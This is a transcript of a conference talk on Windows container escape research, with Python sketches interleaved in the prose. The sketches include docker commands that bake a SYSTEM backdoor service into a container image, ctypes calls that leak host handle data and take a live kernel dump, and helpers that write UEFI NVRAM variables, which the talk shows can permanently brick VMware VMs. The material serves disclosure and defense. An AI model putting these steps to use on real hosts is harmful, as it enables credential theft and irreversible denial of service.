The COW Who Escaped the Silo, by Aaron Segal. Since it is a speaker's first talk, we are going to do the DEF CON tradition. But before we do that, I have two announcements. Number one, if you're sitting, please wear your mask, it's required. And the second announcement is please don't loiter or sit along the walls or the back. Just find yourself a seat, come on down, come a little closer, and enjoy the show. All right. Welcome to my talk, The COW (Container On Windows) Who Escaped the Silo. In this talk, I'll demonstrate how a malicious Windows container image can impact the host it is running on. My name is Aaron Segal. I've been in the cybersecurity field for over seven years. Currently, I'm working as a research team lead at SafeBreach Labs. My experience involves research on Windows and embedded devices. I'll start with background on Windows process-isolated containers. Then I'll continue with how to gain NT AUTHORITY\SYSTEM inside the container. After we gain SYSTEM, I'll explain the method I used to find two vulnerabilities that can impact the host. Then we'll talk about them, show a quick demo, and finish with a Q&A session. So the goal is to find the impact of an attacker-crafted Windows container on the host it is running on. I chose this research because containers are everywhere, the attack vector of a malicious Windows container is a real-world one, and reverse engineering the Windows kernel is fun. So let's dive into Windows containers. Containers are similar to virtual machines. Each container is created from a container image, which contains all the dependencies of the container: for example, the application that the container will run, the file system, host configuration, registry, and even permissions. Because the container image contains all the dependencies, it is easy to manage and use.
And just like virtual machines, containers are also isolated from the host, in order to guarantee that the container won't be able to impact it. Windows containers can be deployed in two modes, process isolation and Hyper-V isolation, which define the level of isolation they will be executed with. Hyper-V containers are very similar to virtual machines: each container has its own kernel, and Hyper-V containers can't interact directly with the host kernel. That means they are more secure, but it comes with computational overhead. Process-isolated containers are similar to Linux containers. The entire container runs in user mode. Process-isolated containers interact with the host kernel, but the container is isolated from the host in multiple aspects, which we will focus on in the next slides. The goal of the isolation is to prevent the container from being able to impact the host. And because the kernel is shared between the container and the host, validations were added to the kernel to block a container from doing activities that can impact the host. In this presentation, I'll focus only on process-isolated containers. When running tasklist inside a Windows container, we'll see lots of system processes which are related to the OS itself, unlike Linux containers, which don't contain any system processes. The reason lies in the differences between the Linux kernel architecture and the Windows kernel architecture. Both Linux and Windows containers run in user mode only, in order to guarantee that they won't be able to impact the host. The Linux kernel is monolithic, so all its basic functionality is implemented in the kernel. Windows is different: some of its functionality is implemented in user mode while the rest is in the kernel. Therefore, Windows containers contain system services such as svchost. So let's dive into how process-isolated containers are implemented. There are two parts to Windows containers.
The first part is the engine, which manages all the containers and loads them; as you might know, that's the Docker engine. The second part is the Windows operating system itself, which is responsible for isolating the container from the host. We will focus only on the Windows part. When a new Windows container starts, Windows creates the environment required for the container: for example, the file system of the container, the object namespace, the job object, and of course the processes that are going to run inside it. Windows container isolation is separated into three parts: job objects, namespaces, and layers. I'm going to focus on bypassing the kernel isolation of the job objects. So let's look at what job objects are. Job objects were created in Windows a long, long time ago to group processes into units and manage their resources: for example, to limit CPU time, memory, and so on. But in order to support isolation as well, the job object must be converted into a silo. A silo object provides basic isolation, but it is not enough for containers, which require much more. So in order for a silo to have all the capabilities required to support containers, it must be converted into a server silo. Every server silo is also a silo. After we convert our silo into a server silo, which supports the redirection of resources, the processes inside the container can use an object manager namespace, registry, and network stack that are loaded from the container image and not from the host. But this isolation is not enough, because the container can interact directly with the kernel, so validations are required in the kernel itself. So let's understand how the kernel blocks dangerous syscalls. If a container makes a dangerous syscall, for example loading a driver that could impact the host, the kernel won't allow the activity.
As you can see in the slide, the kernel validates whether the thread that made the syscall is inside a server silo, which means that it is inside a container. Let's dive into how it detects that. When the kernel needs to detect that the current process is isolated as a container, it checks for a server silo or silo in the ETHREAD or EPROCESS structs, which are the structs that represent threads and processes. The kernel needs to check all the job objects attached to the thread or process, because it is possible to attach multiple job objects to a single thread or process. Another example of a kernel flow which requires validating whether the process is inside a container is the process-list flow. In this flow, the kernel simply skips the processes that are outside of the container. Because of that, when a process inside the container queries the process list, it gets only the processes that are inside the container. So before we try to break out of the container, we need to know whether we are running inside a container at all. Using a single tasklist command, I'll show you how to detect whether we are running inside a container and which isolation method is being used. It is possible to detect that a process is running in a Hyper-V container by listing all the processes and checking whether the process CExecSvc.exe exists: dockerd.exe must not exist in the task list, and CExecSvc.exe must run in session one. Similar to Hyper-V isolation, it is possible to detect process-isolated containers with the same first conditions, but the last one flips: the session ID of CExecSvc.exe must not be one. So after we understand that we are running inside a container, let's check how isolated we really are. When I began my research, I found a couple of indications that containers aren't as isolated from the host as you might think. These methods are trivial, but important for our understanding.
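The tasklist-based detection heuristic described above can be sketched as a small function over an already-parsed process list (process name to session ID). The rules follow the talk; they are heuristics, not an official API.

```python
# Detection heuristic from the talk: CExecSvc.exe present and dockerd.exe
# absent means we're in a container; CExecSvc's session ID tells us which
# isolation mode. The input is assumed to be pre-parsed `tasklist /v` output.

def detect_isolation(processes):
    """processes: dict mapping a process image name to its session ID."""
    if "CExecSvc.exe" not in processes or "dockerd.exe" in processes:
        return "not a container"       # the host, or the Docker engine itself
    if processes["CExecSvc.exe"] == 1:
        return "hyper-v isolation"     # CExecSvc runs in session 1
    return "process isolation"         # CExecSvc present, session != 1

# Example: CExecSvc in session 0 and no dockerd -> process isolation.
print(detect_isolation({"CExecSvc.exe": 0, "smss.exe": 0}))  # process isolation
```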
The process IDs inside the container and outside the container are the same. In the slide, you can see that the PID of CExecSvc.exe inside the container is the same as outside the container, and when comparing all the other processes, you will see that they're the same as well. I guess this could lead to a side-channel attack between two containers via the shared IDs, but it isn't valuable enough. I wanted much more, so I continued to research. When running the container as ContainerUser, I noticed that Process Explorer, running outside of the container, doesn't recognize the ContainerUser account, but it did show all the other system processes running inside the container. That raised the question: why do we have system processes inside the container, and do they have the same permissions as system processes outside the container? Basically, system processes inside the container have almost the same permissions, but where there are isolation checks, as I showed you before, we are blocked, so we need to find a way to bypass that. So before we jump to how to escape the container, let's gain SYSTEM permissions. When running a docker run command with a user flag of ContainerUser, which is a weak user, I would have expected that only weak ContainerUser processes would run. But if you watch the boot process, lots of system processes start from the container image. The only process running as the user we defined is the cmd we executed. Which means that our process can communicate with system processes. And more interestingly, these processes are loaded from the container image, which we control. So if we can control the executables, we can gain NT AUTHORITY\SYSTEM. It doesn't matter which user the container runs as, we can get SYSTEM permissions. But how exactly can we do it? In order to craft a container image that will always run as SYSTEM, we need to follow just these four steps.
First, run the container as SYSTEM, to add our backdoor inside it. Then we create a service that will run as SYSTEM, start it, and convert the container into a container image that we can deploy in the future. But this method is not the only one; there are many more ways to do it. For example, we can overwrite System32 executables that are found in the image, use DLL side-loading, modify the configuration or the registry, and even change the permissions of ContainerUser to have administrator permissions. So we gained SYSTEM permissions inside the container, but we can't do anything we want yet, because we are blocked: we can't load drivers, and we are isolated from the host; we can't access its file system. So in order to break the isolation, we first need to learn about past vulnerabilities. I'm going to explain two examples of past container escape vulnerabilities. Each one of them represents a different method to look for container escape vulnerabilities. The first method is to look for APIs that Microsoft simply forgot to block from the container. Unit 42 found a vulnerability in object manager symbolic links that let a process inside the container access any hard drive it wants. The second method is to try to bypass Microsoft's mitigations. James Forshaw found a way to bypass the kernel validation of the server silo by creating a new silo object which is not a server silo. Microsoft added the support for containers after most of the kernel was already implemented. Therefore, I chose the first method: to look for syscalls that Microsoft just forgot to block. I didn't put a lot of effort into bypassing existing mitigations and validations; it looked much harder and less cost effective. So in my research, I looked for vulnerable syscalls, but there are over 500 of them. It is not possible to go over all of them manually, so I had to narrow this attack surface down to a much smaller set of more interesting functions.
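The four image-crafting steps described above might be scripted roughly as follows. This is an illustrative sketch only: the image tag, container name, service name, and backdoor path are placeholders I chose, not names from the talk.

```python
import subprocess

# Illustrative placeholders ("build-ctr", "BackdoorSvc", "C:\backdoor.exe",
# "malicious-image") -- not from the talk. Services run as LocalSystem by
# default, which is what makes step 2 an always-SYSTEM backdoor.
STEPS = [
    # 1. Run a container so we can plant the backdoor inside it.
    "docker run -d --name build-ctr mcr.microsoft.com/windows/servercore:ltsc2022 ping -t localhost",
    # 2. Create a service inside the container; it will run as SYSTEM.
    'docker exec build-ctr sc create BackdoorSvc binPath= "C:\\backdoor.exe" start= auto',
    # 3. Start the service.
    "docker exec build-ctr sc start BackdoorSvc",
    # 4. Commit the modified container into a reusable image.
    "docker commit build-ctr malicious-image:latest",
]

DRY_RUN = True  # flip to actually execute on a Windows Docker host

for cmd in STEPS:
    if DRY_RUN:
        print(cmd)
    else:
        subprocess.run(cmd, shell=True, check=True)
```

Anyone deploying this image afterwards gets the backdoor service started as SYSTEM regardless of the `--user` flag, which is the point the talk makes.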
As I said before, it has to be a syscall, because otherwise we can't interact with it. Second, the syscall must not have isolation checks, which means that Microsoft may have forgotten to add them. And the third one is tricky: the syscall should require SYSTEM permissions; the higher the privileges, the better. That gives some assurance that the impact of the syscall will be a major info leak, or will let us impact the host drastically. After I built this recipe, my life became much easier and I began to find vulnerable functions. I did a quick triage of syscalls that match the pattern, and the syscall NtQuerySystemInformation caught my attention. This function contains a huge switch-case over the parameter SystemInformationClass, which is an enum that contains about 200 options. I could not go over all of them manually, but luckily I had symbols, so I knew which one does what. I wrote a small piece of code to go over the interesting ones, and I found an interesting option. If I called the syscall with the enum value SystemHandleInformation, it returned a list of all the handles and addresses of the objects from all the processes on the host. It is not possible to use these handles or addresses directly, because we can't open processes that are outside of the container, and we can't duplicate the handles either. So what I found is a minor info leak: we can obtain all the process IDs on the host. But I wanted much more, so I continued to look. An additional interesting syscall that matched the pattern was NtSystemDebugControl, which sounded much better. NtSystemDebugControl is similar to the previous function: it is huge and switches over the enum SYSDBG_COMMAND. The syscall calls multiple interesting functions, for example enabling the kernel debugger. But most of these options are disabled if the kernel debugger is not enabled, and even the option to enable the kernel debugger requires that.
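The SystemHandleInformation query described above can be sketched with ctypes. The information class and the entry layout are undocumented; the layout below is the widely reverse-engineered 64-bit one, so treat it as an assumption. The actual call only runs on Windows, so it is guarded.

```python
import ctypes
import sys

SystemHandleInformation = 16                 # undocumented information class
STATUS_INFO_LENGTH_MISMATCH = 0xC0000004

class SYSTEM_HANDLE_ENTRY(ctypes.Structure):
    """One entry of the SystemHandleInformation result (64-bit layout)."""
    _fields_ = [
        ("UniqueProcessId",       ctypes.c_uint16),  # PID of the handle owner
        ("CreatorBackTraceIndex", ctypes.c_uint16),
        ("ObjectTypeIndex",       ctypes.c_uint8),
        ("HandleAttributes",      ctypes.c_uint8),
        ("HandleValue",           ctypes.c_uint16),
        ("Object",                ctypes.c_void_p),  # kernel address of the object
        ("GrantedAccess",         ctypes.c_uint32),
    ]

def query_handle_information():
    """Call NtQuerySystemInformation(SystemHandleInformation), growing the buffer."""
    ntdll = ctypes.WinDLL("ntdll")
    size = ctypes.c_ulong(1 << 20)
    while True:
        buf = ctypes.create_string_buffer(size.value)
        status = ntdll.NtQuerySystemInformation(
            SystemHandleInformation, buf, size, ctypes.byref(size))
        if status == 0:
            return buf.raw
        if (status & 0xFFFFFFFF) != STATUS_INFO_LENGTH_MISMATCH:
            raise OSError(f"NTSTATUS {status & 0xFFFFFFFF:#x}")
        size.value *= 2   # retry with a larger buffer

if sys.platform == "win32":
    data = query_handle_information()   # leaks host PIDs and kernel addresses
    print(len(data))
else:
    # Off Windows we can only sanity-check the entry layout.
    print(ctypes.sizeof(SYSTEM_HANDLE_ENTRY))
```

Walking the returned buffer entry by entry yields the PID leak the talk describes: every `UniqueProcessId` on the host, even from inside the container.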
All of them, that is, except the user-mode dump, which won't give me any actual value, because it needs a handle to a user-mode process and I can only open processes inside the container, and the kernel dump, which sounded much more interesting. So let's understand how to do a kernel dump using this syscall. In order to do a kernel dump, I need to fill the struct SYSDBG_LIVEDUMP_CONTROL, which contains two interesting variables: a handle to a file, easy, and the flags of the dump, which specify what the dump will contain. I took source code from the internet that triggers the kernel dump, changed it a bit, and now I can dump the entire kernel from inside the container. But let's understand what I can dump. The flags that control which information will be included in the kernel dump are listed here; they are undocumented. The most interesting ones are dump hypervisor pages and dump user-space memory pages, because of LSASS. I attached a kernel debugger to a VM and tried to do a kernel dump from inside the container, and it worked: I managed to dump all user processes on the host, including LSASS. But on a clean Windows machine, dumping user mode is not possible, and the root cause, again, is that the kernel debugger is not enabled. All the other flags worked as expected without a kernel debugger. So I can dump the entire kernel and I can dump additional pages, but I can't dump the user-mode processes. But I still want to access passwords on the host, so let's understand how to access them. There are multiple ways to access passwords on the host without LSASS. The first one is via the command line. The kernel dump contains information about all the processes on the host, including their command-line arguments and environment variables. So if you pass a password in a command-line argument or an environment variable of a process, I can access it from inside the container. Another way: sometimes passwords are stored in the registry, which we can also access using the kernel dump.
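The live-dump call described above might look like the following ctypes sketch. The SYSDBG_LIVEDUMP_CONTROL layout, the SYSDBG_COMMAND value, and the flag bits are all undocumented; the values below come from public reverse-engineering write-ups and are assumptions that may differ across Windows builds. Fixed-width fields model the 64-bit layout.

```python
import ctypes
import sys

SysDbgGetLiveKernelDump = 37   # SYSDBG_COMMAND value, per public write-ups

class SYSDBG_LIVEDUMP_CONTROL(ctypes.Structure):
    """Fixed-width model of the 64-bit layout (undocumented; may vary)."""
    _fields_ = [
        ("Version",           ctypes.c_uint32),  # expected to be 1
        ("BugCheckCode",      ctypes.c_uint32),  # written into the dump header
        ("BugCheckParam1",    ctypes.c_uint64),
        ("BugCheckParam2",    ctypes.c_uint64),
        ("BugCheckParam3",    ctypes.c_uint64),
        ("BugCheckParam4",    ctypes.c_uint64),
        ("DumpFileHandle",    ctypes.c_uint64),  # open handle to the output .dmp
        ("CancelEventHandle", ctypes.c_uint64),
        ("Flags",             ctypes.c_uint32),  # content-selection bits
        ("AddPagesControl",   ctypes.c_uint32),
    ]

# Flag bits as reported in public reverse engineering (assumptions):
FLAG_COMPRESS_MEMORY_PAGES    = 0x2
FLAG_INCLUDE_USER_SPACE_PAGES = 0x4   # only honored with the kernel debugger enabled

def live_kernel_dump(path):
    """Ask the kernel for a live dump; needs SYSTEM, and Windows of course."""
    kernel32 = ctypes.WinDLL("kernel32")
    kernel32.CreateFileW.restype = ctypes.c_void_p
    GENERIC_WRITE, CREATE_ALWAYS = 0x40000000, 2
    handle = kernel32.CreateFileW(path, GENERIC_WRITE, 0, None,
                                  CREATE_ALWAYS, 0, None) or 0
    ctl = SYSDBG_LIVEDUMP_CONTROL(Version=1,
                                  DumpFileHandle=handle,
                                  Flags=FLAG_COMPRESS_MEMORY_PAGES)
    ntdll = ctypes.WinDLL("ntdll")
    return ntdll.NtSystemDebugControl(SysDbgGetLiveKernelDump,
                                      ctypes.byref(ctl), ctypes.sizeof(ctl),
                                      None, 0, None)

if sys.platform == "win32":
    print(live_kernel_dump("C:\\livedump.dmp"))
else:
    print(ctypes.sizeof(SYSDBG_LIVEDUMP_CONTROL))   # 64 with this layout
```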
And if the kernel debugger is enabled, it is possible to dump LSASS directly and access all the passwords in it. Of course, a kernel dump from inside the container can reveal much more: it can reveal which EDRs and security products are running on the host, Windows event logs, stack traces, kernel memory, and much more. An additional vulnerability I found is related to the UEFI. In order to understand the impact and how we can use this vulnerability, I'll give a bit of background. When we boot a new Windows PC, it probably boots in the following sequence. First, the UEFI initializes the CPU and loads the UEFI devices and drivers. Then, the UEFI loads its configuration from the NVRAM in order to know how to continue the boot. Then, execution is forwarded from the UEFI to Windows. In the third step, Windows begins its boot sequence. Windows pulls the configuration from the BCD, which is stored in the EFI system partition. Then it continues the rest of the boot until Windows completes booting. Let's focus on the NVRAM storage. The UEFI NVRAM contains the configuration of the UEFI. These configurations are not stored on the hard disk itself, but on a chip on the motherboard. This memory is shared between the operating system and the UEFI, and there are multiple namespaces in the NVRAM. So in order to access a specific variable there, we need to know its GUID, which identifies its namespace, and the variable name. Two examples of major variables are Boot#### and BootOrder. A Boot#### variable tells the UEFI how to boot using a specific method: for example, boot from hard disk or boot from CD. The content of a Boot#### variable sometimes points to a file on the hard disk, but those files are stored in the EFI system partition, which is FAT32. The container can't access them, so we can't modify them. BootOrder defines the order in which the UEFI will try to boot: whether it's going to try the CD first, then the hard disk, network, and so on.
There are multiple types and flags for the NVRAM variables, which can be classified into two groups: the storage method, which defines whether the variable is volatile or non-volatile, and the access, which defines when we can reach the variable, whether only at boot time or also at runtime, from Windows itself. So let's jump to the vulnerability itself. This vulnerability is related to multiple syscalls, which are all related to the NVRAM. The first capability we want is listing all the NVRAM variables on the host. We can do that using the syscall NtEnumerateSystemEnvironmentValuesEx, which lets us discover all the NVRAM variables of the host, and it is possible to call it from inside the container. But this operation isn't useful unless we can read them, which leads us to the second syscall, NtQuerySystemEnvironmentValueEx, which lets us read the value of a specific NVRAM variable stored on the host. Microsoft didn't block this syscall from the container either. And the last capability we need is writing NVRAM variables, which means that we now have read, write, and list over all the NVRAM variables. So that raises the question: what can we do with it? After a container is killed and started over, its storage is reverted, which means it is not possible to store persistent data. Writing and reading NVRAM gives us persistent storage that survives container restarts, even reboots of the host; and because the NVRAM is stored on the motherboard itself, the data can even survive a disk format. An additional impact is communication between two isolated containers: because both containers can read and write the same NVRAM variables, we can exfiltrate data between them. And the most interesting impact is triggering a permanent denial of service of the host.
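The read/write capability described above can be sketched from user mode. The talk targets the Nt* syscalls directly; this sketch instead uses the documented kernel32 wrappers over them (GetFirmwareEnvironmentVariableW / SetFirmwareEnvironmentVariableW), which require SeSystemEnvironmentPrivilege, so the actual calls are guarded to Windows.

```python
import ctypes
import sys

# GUID of the standard EFI global-variable namespace (BootOrder, Boot####, ...).
EFI_GLOBAL_GUID = "{8BE4DF61-93CA-11D2-AA0D-00E098032B8C}"

def read_nvram_variable(name, guid=EFI_GLOBAL_GUID, size=4096):
    """Read one UEFI variable; needs SeSystemEnvironmentPrivilege."""
    kernel32 = ctypes.WinDLL("kernel32")
    buf = ctypes.create_string_buffer(size)
    n = kernel32.GetFirmwareEnvironmentVariableW(name, guid, buf, size)
    if n == 0:
        raise ctypes.WinError()
    return buf.raw[:n]

def write_nvram_variable(name, data, guid=EFI_GLOBAL_GUID):
    """Write (or, with empty data, delete) one UEFI variable."""
    kernel32 = ctypes.WinDLL("kernel32")
    if not kernel32.SetFirmwareEnvironmentVariableW(name, guid, data, len(data)):
        raise ctypes.WinError()

def parse_boot_order(raw):
    """BootOrder is a packed array of little-endian 16-bit Boot#### numbers."""
    return [int.from_bytes(raw[i:i + 2], "little") for i in range(0, len(raw), 2)]

if sys.platform == "win32":
    print(parse_boot_order(read_nvram_variable("BootOrder")))
else:
    print(parse_boot_order(b"\x01\x00\x03\x00"))   # [1, 3]
```

Used as cross-container storage, one container calls `write_nvram_variable` on an agreed variable name and the other reads it back, exactly the covert channel the talk describes.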
Because the UEFI parses the NVRAM variables, it is possible to change some of them to make the host unbootable forever. Changing the Boot#### and BootOrder variables, which we talked about before, doesn't prevent the UEFI from booting Windows, because of backup configurations which we cannot touch. Therefore, I had to look for other flows and variables. Another NVRAM variable that exists on some UEFIs is HDDP. Writing an invalid value to it will do the job, and it will cause a permanent denial of service to the host. The impact of this write happens only after the host restarts: it will shut down as expected, everything will work perfectly, and when the host tries to boot up again, it won't be possible. The UEFI won't be able to pass execution to the Windows part. So it doesn't matter how many times you restart the machine, it won't start. The impacted UEFI was the VMware UEFI. So if we run a Windows container inside a Windows VM running on, for example, ESXi or VMware Workstation, the UEFI of the Windows VM is the vulnerable component. Writing the HDDP variable from the container will cause a permanent denial of service to the VMware VM. Sadly, the physical host machine won't be impacted. So let's dive in and understand the root cause. The UEFI is built from multiple parts; the vulnerable part is the BdsDxe driver, which is responsible for selecting which device to boot from. The root cause in BdsDxe is that it reads the HDDP variable and, because it is invalid, calls ASSERT_EFI_ERROR. This function stops the boot sequence: it either causes the UEFI to enter an infinite loop it can never leave, or triggers a breakpoint with no debugger attached, so the UEFI halts. Which means the boot sequence stops and the machine will never finish booting. So let's jump to a demo containing a chain of the vulnerabilities.
We'll do the privilege escalation using a malicious Windows container, and then cause a permanent denial of service to the VMware VM. Here you can see the container that we are about to start, which will run with weak privileges and will load the malicious Windows container image. You can see that the user doesn't have admin privileges, but there is a backdoor service that I created beforehand, and it reads and writes to an input file and an output file. So we write the whoami command to the input file, we read the output, and you can see that we have SYSTEM. And if we overwrite the HDDP variable in the NVRAM, it is possible to see that we overwrote it with six 'a' characters. So now all we need to do is wait for the restart. You can see that it restarts as expected: no special actions, Windows doesn't detect any issue. And once it starts up again, the Windows part won't be able to boot; the UEFI will just be stuck. Here the UEFI starts initializing its resources, and when it continues, that's it; we won't pass this step. So let me explain how the demo worked. Before the demo, I created a malicious Windows container image. It contains a backdoor service that runs as NT SYSTEM and reads and writes from the input file and output file. Using this service, we executed the NVRAM-writing executable, which overwrote the HDDP variable, and then restarted the machine, which triggered the permanent denial of service. So let's jump to mitigating this. It is not easy to mitigate these vulnerabilities without an official patch from Microsoft, but there are a few workarounds we can apply. For example, instead of using process-isolated containers, which are easy to use and don't have the computational overhead, we can use Hyper-V isolation, which costs more in performance, but is not vulnerable to the UEFI and kernel vulnerabilities.
Another workaround is to run only signed executables which you can trust, so you won't need to fear malicious Windows containers, but it's really hard to do that. And another one is to assume that any container image may run as SYSTEM, and account for that in the network topology. Container image scanning is used to ensure that no such issues, such as a privilege escalation in a Windows container, exist in the container. I tested my container with the privilege escalation and the scanners didn't detect it; only after I dug into the website did I discover that they don't officially support Windows containers, even though they marked the container as clean. So if you are using container images and you scan them, please make sure that the product supports Windows containers. Sadly, I could not get my hands on a container image scanning product that supports Windows containers. Regarding the vendor response: basically, Microsoft said that because administrators can start containers, the privilege escalation, that we can gain NT SYSTEM inside the container, is not a vulnerability. Regarding the kernel dump, that we can dump the kernel from inside the container, they answered that it is not a vulnerability because we need an administrator user inside the container, which we gained in the privilege escalation, but they do plan to fix it in the future. Regarding the open NVRAM syscalls, with which we can write, read, and list NVRAM variables, Microsoft classified the attack as a moderate denial of service, which is outside the scope of a Windows security update, but they will fix it. And regarding the VMware UEFI HDDP issue, which caused the permanent denial of service to the host, VMware treated it as a functional issue, because it impacts only the VM itself and requires admin privileges from inside, but they do plan to fix it in future releases. I uploaded all the tools and modifications that I used, for doing the privilege escalation and creating a malicious Windows container, to GitHub.
In addition, in this repo, you can find the code that does the kernel dump from inside the container, and a manual for causing a permanent denial of service to a VMware VM. Some acknowledgements: I would like to thank Mickey for helping me reverse the VMware UEFI, and the additional researchers whose work my research builds on. Thank you for joining. The Q&A will be happening over there, so thank you.